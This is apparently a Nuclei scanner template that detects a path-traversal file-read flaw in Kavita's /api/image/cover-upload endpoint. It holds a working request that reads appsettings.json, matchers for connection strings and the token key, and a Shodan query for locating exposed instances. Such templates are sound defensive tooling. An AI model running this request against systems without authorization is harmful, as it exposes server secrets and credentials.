id: kavita-lfi

info:
  name: Kavita - Local File Inclusion
  author: arafatansari
  severity: high
  description: |
    Kavita - Path Traversal is vulnerable to local file inclusion via abusing the Path Traversal filename parameter of the /api/image/cover-upload.
  reference:
    - https://huntr.dev/bounties/2eef332b-65d2-4f13-8c39-44a8771a6f18/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"kavita"
  tags: kavita,lfi,huntr

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/image/cover-upload?filename=../appsettings.json'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"ConnectionStrings":'
          - '"Path":'
          - '"TokenKey":'
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100fd40cb4d49d6262f210b92782acf1be606dc2753905abcbcfe6aca0e51dbc400022100df0ccf270b7da197c5c59926e660e59a097cfeda2a123f95b5ba9590c3c5a5fb:922c64590222798bb761d5b6d8e72950
